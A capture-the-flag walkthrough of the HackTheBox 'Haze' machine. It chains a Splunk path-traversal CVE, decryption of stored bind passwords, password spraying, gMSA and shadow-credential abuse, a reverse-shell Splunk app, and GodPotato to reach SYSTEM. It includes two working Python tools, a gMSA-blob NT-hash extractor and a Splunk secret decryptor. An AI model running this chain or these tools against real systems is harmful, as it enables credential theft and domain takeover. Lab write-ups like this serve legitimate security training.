HTB | Haze

Machine - https://app.hackthebox.com/machines/Haze

IP - 10.10.11.61

NMAP

└─$ nmap -sC -sV -p 53,88,135,139,445,464,593,636,3268,3269,5985,8000,8088,8089,47001,49664,49665,49666,49667,49668,57704,57708,57712,57756 10.10.11.61 -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-21 10:26 IST
Nmap scan report for haze.htb (10.10.11.61)
Host is up (0.59s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-21 12:56:11Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
|_ssl-date: TLS randomness does not represent time
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8000/tcp  open  http          Splunkd httpd
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Splunkd
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://haze.htb:8000/en-US/account/login?return_to=%2Fen-US%2F
8088/tcp  open  ssl/http      Splunkd httpd
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after:  2028-03-04T07:29:08
8089/tcp  open  ssl/http      Splunkd httpd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after:  2028-03-04T07:29:08
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: splunkd
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
57704/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
57708/tcp open  msrpc         Microsoft Windows RPC
57712/tcp open  msrpc         Microsoft Windows RPC
57756/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-06-21T12:57:18
|_  start_date: N/A
|_clock-skew: 7h59m57s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.29 seconds

Port 53

Port 8000

Port 8000 is Splunk Web; the nmap output already shows the redirect to /en-US/account/login. Let's visit the site.

Foothold/shell

Shell as edward.martin

CVE-2024-36991

Searching for known Splunk vulnerabilities, we found CVE-2024-36991.

In Splunk Enterprise on Windows versions below 9.2.2, 9.1.5, and 9.0.10, an attacker could perform a path traversal on the /modules/messaging/ endpoint. The vulnerability only affects Splunk Enterprise on Windows, which fits this target: a Windows domain controller running Splunkd on 8000/8088/8089.

Let's use the traversal to read files from the Splunk installation.

We found password hashes for admin, edward, mark and paul.

Let's try to crack them with hashcat.

None of them cracked.

Let's look for Splunk's configuration files instead (refer this).

Here we found a bindDNpassword, the password Splunk uses to bind to Active Directory for LDAP authentication, and the bind account is Paul.

Auth as Paul.Taylor

According to this discussion, the stored value is not a hash but reversible encryption keyed with splunk.secret, so if we can read that file we can decrypt the password.

A simple Google search gives the path $SPLUNK_HOME/etc/auth/splunk.secret, and we can fetch it with curl through the same traversal.

We found the splunksecrets tool (https://github.com/HurricaneLabs/splunksecrets) for working with Splunk secrets offline.

And now we have Paul's credentials.

Let's see whether these credentials work over SMB or WinRM.

SMB works with Paul's credentials, so let's enumerate shares and users.

I will copy the SidTypeUser entries from the RID brute-force output and print just the usernames.

Let's spray Paul's password across those users and see whether anyone reuses it.

mark.adams is using the same password as Paul.

Auth as Mark.Adams

Mark can log in over WinRM,

and we are in as Mark.

Mark is a member of the gMSA_Managers group.

Bloodhound

Let’s use bloodhound-python

We can see MARK.ADAMS@HAZE.HTB -> MemberOf -> GMSA_MANAGERS@HAZE.HTB

A Group Managed Service Account (gMSA) is a special type of Active Directory (AD) account that administrators use to run automated services securely. Microsoft introduced it in Windows Server 2012 to solve the common problem of managing service account passwords. Unlike traditional service accounts, where administrators often set passwords manually and rarely update them, gMSAs allow Active Directory to manage passwords automatically. Reference: https://www.hackingarticles.in/readgmsapassword-attack/

GMSA_Managers

Currently, Mark is not allowed to read the gMSA password.

We can check who is allowed to retrieve it: the account's PrincipalsAllowedToRetrieveManagedPassword, stored in the msDS-GroupMSAMembership attribute.

Only Domain Admins can read it, and Mark is not a domain admin. But since Mark is in the gMSA managers group, he can modify that list of allowed principals, so we add ourselves to it.

Now we can retrieve the password of Haze-IT-Backup$.
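To show what the retrieval step actually returns, here is an added Python example (not the writeup's code, and not gMSADumper): it parses the MSDS-MANAGEDPASSWORD_BLOB that LDAP hands back in msDS-ManagedPassword once your principal is allowed to read it, and turns the current password into the NT hash used for pass-the-hash. MD4 is implemented inline because hashlib often lacks it on modern OpenSSL builds. The blob in the example is constructed by the script itself from a made-up password; nothing here is data from the box.

```python
#!/usr/bin/env python3
"""Parse a gMSA msDS-ManagedPassword blob and derive the NT hash.

Added example, not the writeup's code. The blob layout follows MS-ADTS
MSDS-MANAGEDPASSWORD_BLOB; the sample blob is constructed by this script.
"""
import struct

# ---- MD4 (RFC 1320), inline because hashlib.md4 is often unavailable ----
_R2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
_R3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
_M = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _M


def md4(data: bytes) -> bytes:
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):  # round 1: F = (b&c)|(~b&d)
            a = _rotl((a + ((b & c) | (~b & d)) + x[i]) & _M, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2: G = majority
            a = _rotl((a + ((b & c) | (b & d) | (c & d)) + x[_R2[i]] + 0x5A827999) & _M,
                      (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3: H = xor
            a = _rotl((a + (b ^ c ^ d) + x[_R3[i]] + 0x6ED9EBA1) & _M, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        h = [(u + v) & _M for u, v in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password_utf16le: bytes) -> str:
    """NT hash = MD4 over the raw UTF-16LE bytes. gMSA passwords are random 16-bit
    units that may not decode as text, so never round-trip them through str."""
    return md4(password_utf16le).hex()


# ---- MSDS-MANAGEDPASSWORD_BLOB ----
_HDR = "<HHLHHHH"  # Version, Reserved, Length, CurrentPwOff, PrevPwOff, QueryOff, UnchangedOff


def _utf16z(buf: bytes) -> bytes:
    """Bytes up to the first 0x0000 code unit (the blob's passwords are NUL-terminated)."""
    for i in range(0, len(buf) - 1, 2):
        if buf[i] == 0 and buf[i + 1] == 0:
            return buf[:i]
    return buf


def parse_managed_password_blob(blob: bytes) -> dict:
    version, _res, length, cur_off, prev_off, q_off, u_off = struct.unpack_from(_HDR, blob, 0)
    if version != 1 or length > len(blob):
        raise ValueError("not a v1 MSDS-MANAGEDPASSWORD_BLOB")
    current = _utf16z(blob[cur_off:(prev_off or q_off)])
    previous = _utf16z(blob[prev_off:q_off]) if prev_off else b""
    query, = struct.unpack_from("<Q", blob, q_off)  # intervals are in 100-ns units
    unchanged, = struct.unpack_from("<Q", blob, u_off)
    return {"current": current, "previous": previous,
            "query_days": query / 1e7 / 86400, "unchanged_days": unchanged / 1e7 / 86400}


def build_managed_password_blob(current: bytes, previous: bytes = b"",
                                query_days=30, unchanged_days=30) -> bytes:
    """Constructed blob for testing the parser; mirrors the layout the DC returns."""
    cur = current + b"\x00\x00"
    prev = previous + b"\x00\x00" if previous else b""
    cur_off, prev_off = 16, (16 + len(cur)) if prev else 0
    body = cur + prev
    body += b"\x00" * ((-(16 + len(body))) % 8)  # 8-byte alignment before the intervals
    q_off = 16 + len(body)
    u_off = q_off + 8
    hdr = struct.pack(_HDR, 1, 0, u_off + 8, cur_off, prev_off, q_off, u_off)
    return hdr + body + struct.pack("<QQ", int(query_days * 86400 * 1e7),
                                    int(unchanged_days * 86400 * 1e7))


def nt_hash_from_blob(blob: bytes) -> str:
    return nt_hash(parse_managed_password_blob(blob)["current"])


if __name__ == "__main__":
    # Made-up password standing in for the 256-byte random value a real gMSA has.
    sample = build_managed_password_blob("NotTheRealHazeBackupPw!".encode("utf-16-le"))
    info = parse_managed_password_blob(sample)
    print("sample gMSA NT hash:", nt_hash_from_blob(sample))
    print("re-query interval: %.0f days" % info["query_days"])
```

The hash is taken over the raw bytes on purpose: a real managed password is 256 bytes of random UTF-16 code units, so decoding it to a string can fail or alter it, while the NT hash only ever needs the bytes. The same hash is what you pass to pass-the-hash capable tools as Haze-IT-Backup$.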

The lesson is to re-collect BloodHound data as soon as you obtain a new principal in the domain; access you just gained can expose edges that were not reachable before.

Bloodhound via new hash

We can see HAZE-IT-BACKUP@HAZE.HTB -> WriteOwner -> SUPPORT_SERVICES@HAZE.HTB -> ForceChangePassword / AddKeyCredentialLink -> EDWARD.MARTIN@HAZE.HTB

WriteOwner

Set HAZE-IT-BACKUP@HAZE.HTB as the owner of SUPPORT_SERVICES@HAZE.HTB.

Now we need to add HAZE-IT-BACKUP@HAZE.HTB to SUPPORT_SERVICES@HAZE.HTB, but ownership alone does not let us change membership; what the owner gets implicitly is the right to write the DACL, so we first grant ourselves full control over the group.

Now that Haze-IT-Backup$ has full control over SUPPORT_SERVICES, we can add ourselves to the group.

Shadow Credentials

We will use https://github.com/ShutdownRepo/pywhisker.git to add a shadow credential to edward.martin, i.e. write a key credential into the account's msDS-KeyCredentialLink attribute, which is exactly what the AddKeyCredentialLink edge permits.

Now let's use https://github.com/dirkjanm/PKINITtools to authenticate with that certificate over PKINIT and obtain a TGT.

Using this TGT, we can grab our NT hash (getnthash.py from the same repo):

Setting Environment Variables

Point KRB5CCNAME at the ccache file so the Kerberos-aware tools pick up the ticket. Note the clock skew of roughly 8 hours that nmap reported: Kerberos rejects requests more than 5 minutes off the DC's time, so the PKINIT and ticket steps need the local clock aligned with the DC (running the tools under faketime is the usual workaround).

Now we WinRM in with the cached ticket,

and we have user.txt.

Privilege Escalation

Shell as Alexander.Green

Extracting creds from the Splunk auth config

As edward.martin we found a backup zip.

It contains an authentication.conf with another bindDNpassword,

and also a splunk.secret. That matters: an encrypted value can only be decrypted with the splunk.secret of the instance that encrypted it, so we use the one that came with the backup.

Now we can decrypt it.
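One Python example, added here and not the writeup's code nor the splunksecrets tool, covering both decryption steps in this writeup: Paul's bindDNpassword with the live splunk.secret, and the backup's bindDNpassword with the backup's own splunk.secret. It implements the two stored-secret formats that splunksecrets documents: legacy `$1$` values are RC4 under the first 16 bytes of splunk.secret over the plaintext XORed with the fixed string DEFAULTSA, and current `$7$` values are AES-256-GCM under a key derived with PBKDF2-HMAC-SHA256(secret, salt "disk-encryption", 1 iteration). The `$7$` path needs the third-party `cryptography` package; everything else is standard library. SECRET and the conf stanza are constructed, not values from the box.

```python
#!/usr/bin/env python3
"""Decrypt (and re-encrypt) Splunk stored secrets with splunk.secret.

Added example, not the writeup's code and not the splunksecrets tool; it
re-implements the two formats that tool documents. SECRET and the conf
stanza below are constructed, not values from the box.
"""
import base64
import hashlib
import itertools
import re

SALT = b"DEFAULTSA"


def _rc4(key: bytes, data: bytes) -> bytes:
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _xor_salt(buf: bytes) -> bytes:
    # Splunk quirk: a byte equal to its salt byte is left as-is (XOR would yield 0).
    return bytes(b if b == k else b ^ k for b, k in zip(buf, itertools.cycle(SALT)))


def load_secret(path: str) -> bytes:
    """Read $SPLUNK_HOME/etc/auth/splunk.secret; the trailing newline is not part of the key."""
    with open(path, "rb") as f:
        return f.read().strip()


# ---- legacy $1$: RC4 keyed with the first 16 bytes of splunk.secret ----
def decrypt_v1(secret: bytes, ciphertext: str) -> str:
    if len(secret) < 16:
        raise ValueError("splunk.secret must be at least 16 bytes")
    plain = _rc4(secret[:16], base64.b64decode(ciphertext[3:]))
    return _xor_salt(plain[:-1]).decode()  # last byte is a NUL terminator


def encrypt_v1(secret: bytes, plaintext: str) -> str:
    if len(secret) < 16:
        raise ValueError("splunk.secret must be at least 16 bytes")
    plain = _xor_salt(plaintext.encode()) + b"\x00"
    return "$1$" + base64.b64encode(_rc4(secret[:16], plain)).decode()


# ---- current $7$: AES-256-GCM, key = PBKDF2-HMAC-SHA256(secret[:254], "disk-encryption", 1) ----
def v7_key(secret: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", secret[:254], b"disk-encryption", 1, dklen=32)


def decrypt_v7(secret: bytes, ciphertext: str) -> str:
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM  # third-party, $7$ only
    raw = base64.b64decode(ciphertext[3:])
    iv, body = raw[:16], raw[16:]  # body = AES-GCM ciphertext || 16-byte tag
    # A wrong splunk.secret fails the GCM tag check (InvalidTag) instead of returning junk.
    return AESGCM(v7_key(secret)).decrypt(iv, body, None).decode()


def decrypt(secret: bytes, ciphertext: str) -> str:
    if ciphertext.startswith("$1$"):
        return decrypt_v1(secret, ciphertext)
    if ciphertext.startswith("$7$"):
        return decrypt_v7(secret, ciphertext)
    raise ValueError("not a Splunk-encrypted value")


def find_encrypted_values(conf_text: str) -> dict:
    """Pull 'key = $1$...' / 'key = $7$...' pairs out of a .conf file (e.g. bindDNpassword)."""
    return dict(re.findall(r"^\s*(\w+)\s*=\s*(\$[17]\$\S+)", conf_text, re.MULTILINE))


# Constructed 254-byte secret standing in for the file's contents.
SECRET = (b"constructed-splunk-secret-not-from-haze-" * 7)[:254]

if __name__ == "__main__":
    # Round-trip a made-up bind password, then recover it from a constructed conf stanza.
    stanza = ("[Sample LDAP Auth]\nbindDN = CN=svc_sample,CN=Users,DC=example,DC=local\n"
              "bindDNpassword = " + encrypt_v1(SECRET, "Ld4p-B1nd-Sample!") + "\n")
    for key, value in find_encrypted_values(stanza).items():
        print(f"{key} -> {decrypt(SECRET, value)}")
```

The `$1$` format has no integrity check, so a wrong splunk.secret silently yields garbage (often a UnicodeDecodeError); `$7$` fails loudly on the GCM tag. Either way, pair each authentication.conf with the splunk.secret from the same install or backup.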

Let's log in as admin on the Splunk portal.

Splunk rev shell

Under “Apps” → “Manage Apps” there is an option to install an app from a file.

We will use this to get a shell: take a reverse-shell Splunk app, edit its run.ps1 to set our IP and port,

then zip the app directory and rename the archive as the installer expects,

install the app and wait for the shell.

SeImpersonatePrivilege

We can see that Alexander has SeImpersonatePrivilege.

I tried PrintSpoofer64.exe but it did not work.

Let's try https://github.com/BeichenDream/GodPotato.

GodPotato abuses SeImpersonatePrivilege to run a command as NT AUTHORITY\SYSTEM, so we get a SYSTEM shell and root.txt.
